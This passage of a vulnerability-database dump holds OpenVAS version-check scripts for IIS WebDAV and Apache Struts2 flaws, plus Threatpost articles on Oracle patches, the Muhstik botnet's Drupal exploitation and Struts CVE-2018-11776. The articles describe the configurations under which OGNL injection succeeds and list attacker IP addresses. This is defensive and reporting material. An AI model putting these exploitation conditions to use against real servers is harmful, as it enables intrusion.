Microsoft KB3197835.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to an error in IIS when\n WebDAV improperly handles objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code in the context of current user.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows XP SP2 x64\n\n - Microsoft Windows XP SP3 x86\n\n - Microsoft Windows 2003 x32/x64 Edition Service Pack 2 and prior\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"wmi_file.inc\");\n\nif( hotfix_check_sp( xp:4, xpx64:3, win2003:3, win2003x64:3 ) <= 0 ) exit( 0 );\n\ninfos = kb_smb_wmi_connectinfo();\nif( ! infos ) exit( 0 );\n\nhandle = wmi_connect( host:infos[\"host\"], username:infos[\"username_wmi_smb\"], password:infos[\"password\"] );\nif( ! handle ) exit( 0 );\n\n# TODO: Limit to a possible known common path\nfileList = wmi_file_fileversion( handle:handle, fileName:\"httpext\", fileExtn:\"dll\", includeHeader:FALSE );\nwmi_close( wmi_handle:handle );\nif( ! fileList || ! is_array( fileList ) ) {\n exit( 0 );\n}\n\n# Don't pass NULL to version functions below\nmaxVer = \"unknown\";\n\nforeach filePath( keys( fileList ) ) {\n\n vers = fileList[filePath];\n\n if( vers && version = eregmatch( string:vers, pattern:\"^([0-9.]+)\" ) ) {\n\n if( version_is_less( version:version[1], test_version:maxVer ) ) {\n continue;\n } else {\n foundMax = TRUE;\n maxVer = version[1];\n maxPath = filePath;\n }\n }\n}\n\nif( foundMax ) {\n if( hotfix_check_sp( xp:4 ) > 0 ) {\n if( version_is_less( version:maxVer, test_version:\"6.0.2600.7150\" ) ) {\n Vulnerable_range = \"Less than 6.0.2600.7150\";\n VULN = TRUE;\n }\n }\n\n else if( hotfix_check_sp( win2003:3, win2003x64:3, xpx64:3 ) > 0 ) {\n if( version_is_less( version:maxVer, test_version:\"6.0.3790.5955\" ) ) {\n Vulnerable_range = \"Less than 6.0.3790.5955\";\n VULN = TRUE;\n }\n }\n}\n\nif( VULN ) {\n report = report_fixed_ver( file_version:maxVer, file_checked:maxPath, vulnerable_range:Vulnerable_range );\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:27", "description": "This host is running Apache Struts and is\n prone to a remote code execution vulnerability.", "cvss3": {}, "published": "2018-08-23T00:00:00", "type": "openvas", "title": "Apache Struts2 Remote Code Execution Vulnerability (S2-057)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310813786", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813786", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Struts2 Remote Code Execution Vulnerability (S2-057)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813786\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2018-11776\");\n script_bugtraq_id(105125);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-08-23 12:45:43 +0530 (Thu, 23 Aug 2018)\");\n script_name(\"Apache Struts2 Remote Code Execution Vulnerability (S2-057)\");\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_struts_detect.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\");\n script_require_ports(\"Services/www\", 8080);\n\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-057\");\n script_xref(name:\"URL\", value:\"https://semmle.com/news/apache-struts-CVE-2018-11776\");\n script_xref(name:\"URL\", value:\"https://lgtm.com/blog/apache_struts_CVE-2018-11776\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is\n prone to a remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to errors in conditions\n when namespace value isn't set for a result defined in underlying configurations\n and in same time, its upper action(s) configurations have no or wildcard\n namespace. Same possibility when using url tag which doesn't have value and\n action set and in same time, its upper action(s) configurations have no or\n wildcard namespace.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attacker to possibly conduct remote code on the affected application.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts versions 2.3 through 2.3.34,\n and 2.5 through 2.5.16\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts version 2.3.35 or\n 2.5.17 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!appPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:appPort, exit_no_version:TRUE)) exit(0);\nappVer = infos['version'];\npath = infos['location'];\n\nif(version_in_range(version:appVer, test_version:\"2.3\", test_version2:\"2.3.34\")){\n fix = \"2.3.35\";\n}\nelse if(version_in_range(version:appVer, test_version:\"2.5\", test_version2:\"2.5.16\")){\n fix = \"2.5.17\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:appVer, fixed_version:fix, install_path:path);\n security_message(data:report, port:appPort);\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:52", "description": "VMware product updates resolve remote code execution vulnerability via Apache Struts 2", "cvss3": {}, "published": "2017-03-31T00:00:00", "type": "openvas", "title": "VMSA-201-0004: vRealize Operations (vROps) Remote Code Execution Vulnerability Via Apache Struts 2", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310140229", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140229", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vmware_vrealize_operations_manager_VMSA-2017-0004.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# VMSA-201-0004: vRealize Operations (vROps) Remote Code Execution Vulnerability Via Apache Struts 2\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:vmware:vrealize_operations_manager';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140229\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 12106 $\");\n script_name(\"VMSA-201-0004: vRealize Operations (vROps) Remote Code Execution Vulnerability Via Apache Struts 2\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2017-0004.html\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"Updates are available\");\n\n script_tag(name:\"summary\", value:\"VMware product updates resolve remote code execution vulnerability via Apache Struts 2\");\n script_tag(name:\"insight\", value:\"Multiple VMware products contain a remote code execution vulnerability due to the use of Apache Struts 2. Successful exploitation of this issue may result in the complete compromise of an affected product.\");\n\n script_tag(name:\"affected\", value:\"vROps 6.2.1, 6.3, 6.4 and 6.5\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-31 10:25:48 +0200 (Fri, 31 Mar 2017)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_family(\"VMware Local Security Checks\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_vrealize_operations_manager_web_detect.nasl\");\n script_mandatory_keys(\"vmware/vrealize/operations_manager/version\", \"vmware/vrealize/operations_manager/build\");\n\n exit(0);\n\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\n\nif( ! version = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( ! build = get_kb_item( \"vmware/vrealize/operations_manager/build\" ) ) exit( 0 );\n\nif( version =~ \"^6\\.3\\.0\" )\n if( int( build ) < int( 5263486 ) ) fix = '6.3.0 Build 5263486';\n\nif( version =~ \"^6\\.2\\.1\" )\n if( int( build ) < int( 5263486 ) ) fix = '6.2.1 Build 5263486';\n\nif( version =~ \"^6\\.4\\.0\" )\n if( int( build ) < int( 5263486 ) ) fix = '6.4.0 Build 5263486';\n\nif( version =~ \"^6\\.5\\.0\" )\n if( int( build ) < int( 5263486 ) ) fix = '6.5.0 Build 5263486';\n\n\nif( fix )\n{\n report = report_fixed_ver( installed_version:version + ' Build ' + build, fixed_version:fix );\n security_message( port:port, data:report );\n exit(0);\n}\n\nexit( 99 );\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:24", "description": "Cisco Unified Communications Manager is prone to a vulnerability in Apache\nStruts2.", "cvss3": {}, "published": "2017-03-14T00:00:00", "type": "openvas", "title": "Cisco Unified Communications Manager Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106647", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106647", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cisco_cucm_cisco-sa-20170310-struts2.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Cisco Unified Communications Manager Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cisco:unified_communications_manager\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106647\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 12106 $\");\n\n script_name(\"Cisco Unified Communications Manager Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\");\n\n script_xref(name:\"URL\", value:\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170310-struts2\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"Cisco Unified Communications Manager is prone to a vulnerability in Apache\nStruts2.\");\n\n script_tag(name:\"insight\", value:\"On March 6, 2017, Apache disclosed a vulnerability in the Jakarta multipart\nparser used in Apache Struts2 that could allow an attacker to execute commands remotely on the targeted system\nusing a crafted Content-Type header value.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-14 09:51:18 +0700 (Tue, 14 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"CISCO\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_cisco_cucm_version.nasl\");\n script_mandatory_keys(\"cisco/cucm/version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE))\n exit(0);\n\nversion = str_replace( string:version, find:\"-\", replace:\".\" );\n\nif (version =~ \"^11\\.0\" || version =~ \"^11\\.5\") {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(port: 0, data: report);\n exit(0);\n}\n\nexit(99);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T22:53:48", "description": "Oracle released its biggest [Critical Patch Update](<http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html>) ever on Tuesday, and with it came added urgency in the form of patches for the Solaris vulnerabilities exposed by the [ShadowBrokers](<https://threatpost.com/shadowbrokers-expose-nsa-access-to-swift-service-bureaus/124996/>) last week, as well as the recent [Apache Struts 2 vulnerability](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>), also under public attack.\n\nIn all, Oracle admins have a tall order with 299 patches across most of the company\u2019s product lines; 162 of the vulnerabilities are remotely exploitable.\n\nTwo Solaris exploits were leaked by the mysterious ShadowBrokers last Friday. The Solaris attacks were included among a rash of other exploits including a laundry list of Windows attacks, many of which had [already been patched by Microsoft](<https://threatpost.com/shadowbrokers-windows-zero-days-already-patched/125009/>) prior to last Friday\u2019s dump.\n\nOne of the Solaris vulnerabilities, code-named EBBISLAND, had been patched in a number of updates dating back to 2012. The other, EXTREMEPARR, was addressed on Tuesday. It affects Solaris 7-10 on x86 and SPARC architectures, and is a local privilege escalation issue in the [dtappgather](<https://github.com/HackerFantastic/Public/blob/master/exploits/dtappgather-poc.sh>) component. Oracle patched versions 10 and 11.3 on Tuesday.\n\nResearcher Matthew Hickey of U.K. consultancy Hacker House, said the EXTREMEPARR attacks go back to Solaris 7, while EBBISLAND affects Solaris 6-10, and is a remote RPC services exploit. Both exploits allow attackers to elevate privileges to root and run shells on a compromised server.\n\n> I said in December that EBBISLAND was likely an exploit for Solaris 6 through 10, I am today confirmed correct (upto 9, still untested) <https://t.co/A3fC7BuwcK>\n> \n> \u2014 Hacker Fantastic (@hackerfantastic) [April 8, 2017](<https://twitter.com/hackerfantastic/status/850802122224488452>)\n\n\u201cAs a security researcher it was an extremely interesting find to discover such well written exploits in a public data dump,\u201d Hickey wrote in a [report](<https://www.myhackerhouse.com/easter-egg-hunt_greetz/#sthash.YMmAy8Ez.dpuf>) published today, \u201ceven though the bug was a trivial path traversal for \u2018dtappgather\u2019 extensive steps had been taken to protect the attack specifics in the binary and a well tested tool which worked flawlessly on all tested hosts was included.\u201d\n\nSince last August, the ShadowBrokers have periodically released tools belonging to the Equation Group, widely believed to be the U.S. National Security Agency. The Solaris attacks are of particular concern since these are the backbone of many enterprise-grade server environments.\n\n> The NSA had the power to hack any Oracle Solaris box in the world via UDP/TCP generically with anti-forensics capabilities and its public.\n> \n> \u2014 Hacker Fantastic (@hackerfantastic) [April 10, 2017](<https://twitter.com/hackerfantastic/status/851561358516736000>)\n\n\u201cThis vulnerability can be exploited remotely without authentication or any information about the targeted machine,\u201d said Amol Sarwate, director of [Qualys Vulnerability Labs](<https://blog.qualys.com/laws-of-vulnerabilities/2017/04/18/oracle-plugs-struts-hole-along-with-299-total-vulnerabilities>). \u201cThese are very critical vulnerabilities.\u201d\n\nThe [Apache Struts 2 vulnerability](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>) has been public since early March, though it\u2019s been publicly exploited for much longer. The flaw is in the Jakarta Multipart parser in Struts 2 2.3 before 2.3.32 and in 2.5 before 2.5.10.1. A remote attacker could upload a malicious Content-Type value and have it execute. Public scans and attacks ramped up immediately upon disclosure of the issue and development of a Metasploit module. For the most part, Linux-based DDoS bots were behind most of the exploit attempts, but a spate of attacks were detected attempting to install [Cerber ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) on vulnerable Windows servers.\n\nOracle patched Struts 2 on 25 of its products, including 19 different instances of its Oracle Financial Services Applications. Most of these Oracle applications, however, are not internet-facing and live behind an enterprise firewall.\n\n\u201cThat could be a little bit of a saving grace for some of these services,\u201d Qualys\u2019 Sarwate said. There could be some instances, however, where these apps are exposed to the public network for remote administration purposes, for example. There are also some cases in which admins may be learning for the first time that Struts 2 is running inside an Oracle product. \u201cFor a normal admin, it could be a little difficult unless a vendor tells them these are the products you\u2019re running that are affected by the Struts 2 vulnerability. It could take some admins by surprise.\u201d\n\nWhile there were 47 patches in total for the financial applications suite, the MySQL database also received a hefty load of 39 fixes, 11 of which are remotely exploitable without authentication. The Oracle Retail Applications suite also had 39 vulnerabilities addressed, 32 of which were remotely exploitable. Oracle Fusion Middleware received 31 patches, 20 of which were for remotely exploitable vulnerabilities.\n\nThe previous record for quarterly Oracle patches was last July when [276 patches](<https://threatpost.com/oracle-patches-record-276-vulnerabilities-with-july-critical-patch-update/119373/>) were released; January\u2019s update, the first for 2017, had [270 patches](<https://threatpost.com/oracle-patches-270-vulnerabilities-in-years-first-critical-patch-update/123155/>).\n", "cvss3": {}, "published": "2017-04-19T07:20:09", "type": "threatpost", "title": "Record Oracle Patch Update Addresses ShadowBrokers, Struts 2 Vulnerabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776"], "modified": "2017-04-21T19:31:17", "id": "THREATPOST:F4E175435A7C5D2A4F16D46A939B175E", "href": "https://threatpost.com/record-oracle-patch-update-addresses-shadowbrokers-struts-2-vulnerabilities/125046/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-04-25T05:50:10", "description": "Researchers are warning a recently discovered and highly critical vulnerability found in Drupal\u2019s CMS platform is now being actively exploited by hackers who are using it to install cryptocurrency miners and to launch DDoS attacks via compromised systems. At the time of the disclosure, last month, researchers said they were not aware of any public exploits.\n\nNow Netlab 360 researchers say they have identified a botnet, dubbed Muhstik, that is taking advantage of the Drupal bug. They said multiple scans on infected Drupal instances reveal[ attackers](<https://blog.netlab.360.com/botnet-muhstik-is-actively-exploiting-drupal-cve-2018-7600-in-a-worm-style-en/>) are exploiting the vulnerability by accessing a URL and then injecting exploit code. The technique allows adversaries to execute commands on targeted servers running Drupal.\n\nThe Muhstik botnet exploits Drupal vulnerability ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)), impacting versions 6,7, and 8 of Drupal\u2019s CMS platform. \u201cThis potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d warned MITRE\u2019s Common Vulnerabilities and Exposures bulletin on March 28.\n\nDrupal, which also released a patch for the vulnerability in [March](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>), warned that over one million sites running Drupal are impacted. Unprivileged and untrusted attackers could also modify or delete data hosted on affected CMS platforms, Drupal said.\n\nAfter further investigations, Netlab researchers said that it believes at least three groups of malware were exploiting the vulnerability.\n\n\u201cWe noticed one of them has worm-propagation behavior. After investigation, we believe this botnet has been active for quit a time. We name it Muhstik, for this keyword keeps popup in its binary file name and the communication IRC channel,\u201d wrote Netlab 360 researchers.\n\nAccording to Netlab, Muhstik is a variant of Tsunami, a malware strain that creates botnets with infected Linux servers and Linux-based IoT devices.\n\nMuhstik has the capability to install two coinminers \u2013 XMRig (XMR) and CGMiner \u2013 to mine the open-source, peer-to-peer Dash cryptocurrency, according to Netlab.\n\nResearchers say the botnet uses the open-source XMRig utility to mine cryptocurrency with a self-built mining pool (47.135.208.145:4871). Meanwhile, it uses popular mining software CGMiner to to dig cryptocurrency coins using multiple mining tools (with username reborn.D3), they said.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2018/04/23162156/Botnet-1024x507.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/04/23162156/Botnet.png>)\n\nIn addition Netlab researchers said they intercepted multiple DDoS attack instructions targeting the IP address 46[.]243[.]189[.]102.\n\nMuhstik relies on 11 command and control domains and IP addresses, and the attackers also uses the IRC communication protocol to invoke commands for the botnet: \u201cWe observed multiple IRC Channels, all starting with \u2018muhstik,'\u201dsaid Netlab researchers in a report. \u201cAt present, we can not confirm which specific channels are open on which C2 server. This is due to the characteristics of the IRC protocol itself. Only when we receive a communication instruction from the corresponding channel can we confirm it\u2019s present.\u201d\n\nMuhdtik also has capabilities to scan for vulnerable server apps using the the aiox86 scanning module. This module \u201cscans TCP port 80, 8080, 7001, 2004, and tries varieties of different payloads on each port,\u201d according to NetLab.\n\nGreyNoise Intelligence said in a tweet that it detected the botnet to be exploiting a vulnerability (CVE-2017-10271) in Oracle WebLogic Server as well, indicating that Muhstik is exploiting vulnerabilities in other server applications.\n\n> UPDATE: there is a 95% overlap between the IPs scanning for the previously reported [#drupalgeddon](<https://twitter.com/hashtag/drupalgeddon?src=hash&ref_src=twsrc%5Etfw>) vulnerability and the Oracle CVE-2017-10271 vulnerability.\n> \n> \u2014 GreyNoise Intelligence (@GreyNoiseIO) [April 18, 2018](<https://twitter.com/GreyNoiseIO/status/986458691787517952?ref_src=twsrc%5Etfw>)\n\nTroy Mursch, founder of Bad Packets Report, told Threatpost that given the criticality of the exploit and the repurcussions once it\u2019s used, \u201cthe race is on to find vulnerable Drupal installations.\u201d\n\n\u201cI recommend affected users update to Drupal 7.58 or 8.5.1 as soon as possible. To note as well, updating to the patched version doesn\u2019t retroactively \u2018unhack\u2019 your site. I recommend website operators check their installation (server) for any of the IoCs mentioned in the 360 Netlab report after completing the update,\u201d he said.\n", "cvss3": {}, "published": "2018-04-23T22:13:25", "type": "threatpost", "title": "Muhstik Botnet Exploits Highly Critical Drupal Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2018-7600"], "modified": "2018-04-23T22:13:25", "id": "THREATPOST:5633BBF7C54D598EB76A7B3781EFD2CB", "href": "https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-06-28T05:48:46", "description": "A critical remote code-execution vulnerability in Apache Struts 2, the popular open-source framework for developing web applications in the Java programming language, is threatening a wide range of applications, even when no additional plugins have been enabled. Successful exploitation could lead to full endpoint and eventually network compromise, according to researchers \u2013 who said that the flaw is more dangerous than the similar vulnerability used to compromise Equifax last year.\n\nA [working exploit](<https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/>) surfaced within a day of its disclosure.\n\nThe vulnerability ([CVE-2018-11776](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11776>)) was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-057>) by the Apache Software Foundation yesterday and affects all supported versions of Struts 2: Users of Struts 2.3 should upgrade to 2.3.35; users of Struts 2.5 need to upgrade to 2.5.17. They should do so as soon as possible, given that bad actors are likely already working on exploits, according to the Semmle research team\u2019s Man Yue Mo, who uncovered the flaw.\n\n\u201cThis vulnerability affects commonly-used endpoints of Struts, which are likely to be exposed, opening up an attack vector to malicious hackers,\u201d he said in a [posting](<https://semmle.com/news/apache-struts-CVE-2018-11776>) on Wednesday. \u201cOn top of that, the weakness is related to the Struts Object-Graph Navigation Language (OGNL) language, which hackers are very familiar with, and are known to have been exploited in the past.\u201d\n\n[OGNL](<https://commons.apache.org/proper/commons-ognl/>) is a powerful, domain-specific language that is used to customize Struts\u2019 behavior.\n\n\u201cOn the whole, this is more critical than the highly critical Struts RCE vulnerability that the Semmle Security Research Team discovered and announced last September,\u201d said Yue Mo, referring to the infamous vulns (CVE-2017-9805) that hackers used to compromise Equifax last year, which led to the lifting of [personal details of 147 million consumers](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>).\n\nTim Mackey, technology evangelist at Synopsys, told Threatpost that this is due to the fact that it affects a wider swath of the Struts architecture.\n\n\u201cIn the case of CVE-2018-11776, the root cause [is] a lack of input validation on the URL passed to the Struts framework,\u201d he explained. \u201cThe prior [Struts] vulnerabilities were all in code within a single functional area of the Struts code. This meant that developers familiar with that functional area could quickly identify and resolve issues without introducing new functional behaviors. CVE-2018-11776 operates at a far deeper level within the code, which in turns requires a deeper understanding of not only the Struts code itself, but the various libraries used by Struts. It is this level of understanding which is of greatest concern \u2013 and this concern relates to any library framework.\u201d\n\n## Anatomy of the Flaw\n\nThe vulnerability is caused by insufficient validation of untrusted user data in the core of the Struts framework, according to the team\u2019s findings.\n\n\u201cAttackers can attack vulnerable applications by injecting their own namespace as a parameter in an HTTP request,\u201d they explained. \u201cThe value of that parameter is insufficiently validated by the Struts framework, and can be any OGNL string.\u201d\n\nBecause the issue affects the core of Struts, there are at least two separate attack vectors \u2013 and potentially many more.\n\nIn the first attack scenario, three Struts result types are unsafe when used without a namespace, as defined in either in the Struts configuration file or in Java code if the Struts Convention plugin is used. These are the redirect action, which redirects the visitor to a different URL; action chaining, which is a method to chain multiple actions into a defined sequence or workflow; and postback result, which renders the current request parameters as a form which immediately submits a postback to the specified destination chain or postback.\n\nThe researchers explained: \u201cAn example of a struts.xml configuration that is potentially vulnerable: the <action \u2026> tag does not have a namespace attribute and contains a result of type redirectAction. If you use the Struts Convention plugin, you will also have to look for actions and results that are configured using Java code.\u201d\n\nThe second attack vector has to do with the fact that Struts supports page templates inside <result> tags in the Struts configuration: \u201cThe use of URL tags in such pages is potentially unsafe if the template is referred to from an <action> tag that does not provide a namespace attribute (or specifies a wildcard namespace),\u201d the researchers said. \u201cYour application is vulnerable if the template contains an <s:url \u2026> tag without an action or value attribute.\u201d\n\nResearchers noted that for an exploit for either of the known vectors to be successful, an application must have the alwaysSelectFullNamespace flag set to \u201ctrue\u201d in the Struts configuration \u2013 a default state if the application uses the popular Struts Convention plugin. Also, the application\u2019s actions must be configured without specifying a namespace, or with a wildcard namespace (e.g. \u201c/*\u201d).\n\n\u201cThis applies to actions and namespaces specified in the Struts configuration file (e.g. <action namespace=\u201dmain\u201d>), but also to actions and namespaces specified in Java code if you are using the Struts Convention plugin,\u201d they explained.\n\nThat said, they also cautioned that other attack vectors may emerge that apply to different configurations.\n\n\u201cWhether or not a Struts application is vulnerable to remote code execution largely depends on the exact configuration and architecture of the application,\u201d the firm said. \u201cNote that even if an application is currently not vulnerable, an inadvertent change to a Struts configuration file may render the application vulnerable in the future. You are therefore strongly advised to upgrade your Struts components, even if you believe your configuration not to be vulnerable right now.\u201d\n\nThis is a critical point, according to Mackey. \u201cValidating the input to a function requires a clear definition of what is acceptable,\u201d he said. \u201cIt equally requires that any functions available for public use document how they use the data passed to them. Absent the contract such definitions and documentation form, it\u2019s difficult to determine if the code is operating correctly or not. This contract becomes critical when patches to libraries are issued as its unrealistic to assume that all patches are free from behavioral changes. Modern software is increasingly complex and identifying how data passes through it should be a priority for all software development teams.\u201d\n\nPavel Avgustinov, vice president of QL Engineering at Semmle, laid out what\u2019s at 